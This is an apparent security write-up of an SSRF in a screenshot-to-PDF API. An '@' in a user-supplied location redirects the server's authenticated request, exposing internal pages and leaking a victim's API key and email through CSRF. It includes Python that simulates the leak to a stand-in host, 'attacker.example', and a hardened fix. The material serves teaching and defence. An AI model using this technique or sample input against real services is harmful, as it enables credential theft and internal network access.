Exploiting a double-edged SSRF for server and client-side impact

We discussed this vulnerability during Episode 135 on 11 April 2022

Server-Side Request Forgery with both server-side and client-side impact.

There was an API endpoint that would email the user a PDF containing a screenshot of a given location. The location was intended to be just an endpoint on the application itself, but an @ could be used to break out of that host. In a URL the authority section is [userinfo@]host, so once user input lands before the first slash, everything before the @ is treated as the userinfo and whatever follows it becomes the real host. An attacker could therefore supply a custom domain and path for the request the server made.

This allowed for the obvious server-side impact: reaching internal endpoints, including a Redash login page with the credentials auto-filled and visible in plain text (including the password).

The client-side impact comes from the fact that the request the server made to take the screenshot was authenticated as the current user. It did this by adding a couple of headers, one carrying the user's API key and the other their email, which together authenticated the request as that user. Because the server attached those headers to whatever URL the location resolved to, an attacker could leak a victim's API key and email by tricking the victim into navigating to the vulnerable endpoint with a CSRF attack: the victim's browser triggers the screenshot request, and the server sends the victim's credentials to the attacker-controlled host.
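The following is an added example, not code from the episode or from the affected application. It models both halves of the bug: a URL builder that appends the user-supplied location directly after the host (an assumed construction; the page only says an @ broke out of the intended host), a simulated screenshot worker that attaches the requesting user's API key and email, and a hardened builder that parses the location first and refuses anything that is not a bare path. The host name, the header names and the victim record are all assumptions, and nothing here makes a network request.

```python
"""Added example: how an @ in a user-supplied "location" moves a server-side
screenshot fetch to another host, why that leaks the per-user headers the
server attaches, and a parse-then-validate fix.  All names are assumptions.
"""
from urllib.parse import urljoin, urlsplit

APP_HOST = "app.example.com"  # assumed host of the vulnerable application
# Assumed header names; the page only says one carried the API key, one the email.
API_KEY_HEADER = "X-API-Key"
EMAIL_HEADER = "X-User-Email"

# Constructed victim record used to show where the credentials end up.
VICTIM = {"api_key": "sk_victim_0000", "email": "victim@example.com"}


def build_screenshot_url_vulnerable(location: str) -> str:
    """Assumed vulnerable builder: `location` is meant to be a path such as
    "/map/123" but is appended straight after the host, so a value beginning
    with "@" is still parsed as part of the URL authority.
    """
    return f"https://{APP_HOST}{location}"


def screenshot_request(url: str, user: dict) -> dict:
    """Simulates the screenshot worker.  It authenticates the fetch as the
    requesting user by attaching their API key and email, and returns the
    host that would receive those headers instead of sending anything.
    """
    parts = urlsplit(url)
    return {
        "host": parts.hostname,
        "headers": {API_KEY_HEADER: user["api_key"], EMAIL_HEADER: user["email"]},
    }


def leaked_to(location: str) -> str:
    """Which host receives VICTIM's headers with the vulnerable builder."""
    return screenshot_request(build_screenshot_url_vulnerable(location), VICTIM)["host"]


class UnsafeLocation(ValueError):
    """Raised when a location would make the server request leave APP_HOST."""


def build_screenshot_url_safe(location: str) -> str:
    """Hardened builder: treat `location` strictly as a path on APP_HOST.

    1. Reject backslashes: WHATWG-style parsers (browsers, headless Chrome)
       treat them as forward slashes, so "/\\evil" becomes "//evil".
    2. Parse the user value on its own; any scheme or authority ("https://",
       "//evil", "evil:80") means it is not a bare path.
    3. Join with an explicit "/" so the value can never reach the authority.
    4. Re-parse the result and confirm the host (defence in depth).
    """
    if "\\" in location:
        raise UnsafeLocation("backslash in location")
    parts = urlsplit(location)
    if parts.scheme or parts.netloc:
        raise UnsafeLocation("location must be a path, not a URL")
    url = urljoin(f"https://{APP_HOST}/", location.lstrip("/"))
    final = urlsplit(url)
    if (final.scheme != "https" or final.hostname != APP_HOST
            or final.username or final.password):
        raise UnsafeLocation(f"request would leave {APP_HOST}: {url}")
    return url


def is_rejected(location: str) -> bool:
    """True if the hardened builder refuses `location`."""
    try:
        build_screenshot_url_safe(location)
    except UnsafeLocation:
        return True
    return False


if __name__ == "__main__":
    for loc in ["/map/123", "@attacker.example/collect", "//attacker.example/x"]:
        print(f"{loc!r:32} vulnerable -> {leaked_to(loc)!r:20} "
              f"hardened rejects: {is_rejected(loc)}")
```

The important design choice is parsing the user value before it is joined, rather than scanning the final URL for an @: the hardened builder refuses anything with a scheme or authority of its own, inserts the slash itself, and only then checks the host of the assembled URL, so an @ that survives ends up harmlessly inside the path.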